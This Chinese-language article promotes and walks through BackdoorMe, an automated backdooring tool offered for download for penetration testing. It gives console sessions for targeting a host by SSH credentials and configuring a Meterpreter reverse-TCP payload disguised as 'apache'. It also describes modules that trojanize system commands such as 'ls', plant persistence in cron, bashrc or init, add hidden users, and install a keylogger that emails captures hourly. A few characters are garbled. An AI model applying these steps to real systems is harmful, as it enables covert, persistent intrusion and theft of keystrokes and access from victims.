強(qiáng)大的自動(dòng)化后門(mén) 用于滲透測(cè)試(BackdoorMe)

BackdoorMe是一款功能強(qiáng)大的自動(dòng)化后門(mén)工具，用于滲透測(cè)試！很明顯，軟件是帶有攻擊性的，嚴(yán)禁用于非法用途。該工具目前使用了metasploit接口，以后會(huì)慢慢淡化接口，增強(qiáng)自身特色。需要的朋友下！

什么是后門(mén)程序

后門(mén)程序一般是指那些繞過(guò)安全性控制而獲取對(duì)程序或系統(tǒng)訪(fǎng)問(wèn)權(quán)的程序方法。在軟件的開(kāi)發(fā)階段，程序員常常會(huì)在軟件內(nèi)創(chuàng)建后門(mén)程序以便可以修改程序設(shè)計(jì)中的缺陷。但是，如果這些后門(mén)被其他人知道，或是在發(fā)布軟件之前沒(méi)有刪除后門(mén)程序，那么它就成了安全風(fēng)險(xiǎn)，容易被黑客當(dāng)成漏洞進(jìn)行攻擊。

后門(mén)程序又稱(chēng)特洛依木馬，其用途在于潛伏在電腦中，從事搜集信息或便于黑客進(jìn)入的動(dòng)作。后門(mén)程序和電腦病毒最大的差別，在于后門(mén)程序不一定有自我復(fù)制的動(dòng)作，也就是后門(mén)程序不一定會(huì)“感染”其它電腦。

BackdoorMe有哪些功能模塊

其內(nèi)置了Backdoors（后門(mén)）、Modules（模塊）和Auxiliaries（輔助模塊）

Bash

Bash2 (依賴(lài)更多)

Metasploit

Netcat

Netcat-traditional

Perl

Php (非WEB后門(mén)，但使用了WEB模塊)

Pupy

Python

Web (php –WEB后門(mén))

BackdoorMe怎么用

在安裝backdoorme之前，請(qǐng)先確保您準(zhǔn)備好了所有的依賴(lài)包。

$ python dependencies.py

啟動(dòng)backdoorme：

$ python master.py     ___           __      __              __  ___    / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__   / _  / _ `/ __/  '_/ _  / _ \/ _ \/ __/ /|_/ / -_)  /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/  /_/\__/  Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.  Type "addtarget" to set a target, and "open" to open an SSH connection to that target.  Using local IP of 10.1.0.1.  >>

加入target：

>> addtarget  Target Hostname: 10.1.0.2  Username: victim  Password: password123   + Target 1 Set!  >>

Backdoor

請(qǐng)輸入“use”關(guān)鍵詞來(lái)使用后門(mén)：

>> use metasploit  + Using current target 1.   + Using Metasploit backdoor...  (msf) >>

從從這兒開(kāi)始，你可以設(shè)置后門(mén)相關(guān)選項(xiàng)，運(yùn)行“show options”或者“help”，來(lái)查看需要配置的參數(shù)。這里設(shè)置選項(xiàng)，用“set”就行了。

(msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        initd       name of the backdoor        False  format      elf     format to write the backdoor to     True  lhost       10.1.0.1        local IP to connect back to     True  encoder     none        encoder to use for the backdoor     False  lport       4444        local port to connect back on       True  payload     linux/x86/meterpreter/reverse_tcp       payload to deploy in backdoor       True  (msf) >> set name apache   + name => apache  (msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        apache      name of the backdoor        False  ...

Modules

每個(gè)后門(mén)在添加了額外的模塊后，會(huì)變得更加有效。要添加一個(gè)模塊，只需要使用“add”。

(msf) >> add poison   + Poison module added

每個(gè)模塊都有額外的參數(shù)可以定制，如果運(yùn)行了“help”，你可以看到或者設(shè)置任何附加選項(xiàng)。

(msf) >> help  ...  Poison module options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        ls        name of command to poison     False  location /bin       where to put poisoned files into        False

現(xiàn)在能啟用的模塊包括：

Poison：

感染目標(biāo)計(jì)算機(jī)上的可執(zhí)行文件，它會(huì)編譯一個(gè)exe，把原有的程序變?yōu)楹箝T(mén)。

比如，如果這個(gè)模塊感染了“l(fā)s”，它會(huì)進(jìn)行編譯，然后把正�！發(fā)s”給變成后門(mén)“l(fā)s”，這樣一來(lái)用戶(hù)可以更頻繁地運(yùn)行“l(fā)s”后門(mén)。

Cron：

作用和做法同上。

Web：

啟動(dòng)WEB服務(wù)，放置存有后門(mén)的WEB頁(yè)面，訪(fǎng)問(wèn)該網(wǎng)頁(yè)則監(jiān)聽(tīng)開(kāi)始。

Keylogger：

植入鍵盤(pán)記錄器，在配置時(shí)可以配入點(diǎn)自己郵件，每小時(shí)會(huì)收到結(jié)果。

User：

添加新用戶(hù)。

Startup：

可以將后門(mén)植入bashrc或者init文件。

Auxiliaries

為了更加隱蔽，某些用戶(hù)可能會(huì)希望在目標(biāo)機(jī) 器上使用特定的服務(wù)。應(yīng)用auxiliary模塊，使用“apply”即可。

>> apply user  + User Auxiliary Module added.

Auxiliaries支持modules的使用，所有它們能更加隱蔽和頻繁的運(yùn)行。

>> (user) add startup  + Startup Module added.

現(xiàn)有啟用的auxiliaries包括：

User

在目標(biāo)機(jī)器添加新用戶(hù)。

Targets

Backdoorme支持同時(shí)操作多個(gè)目標(biāo)，使用數(shù)字序號(hào)切換即可。比如，使用“use metasploit 2”命令，可以在目標(biāo)“2”上使用msf。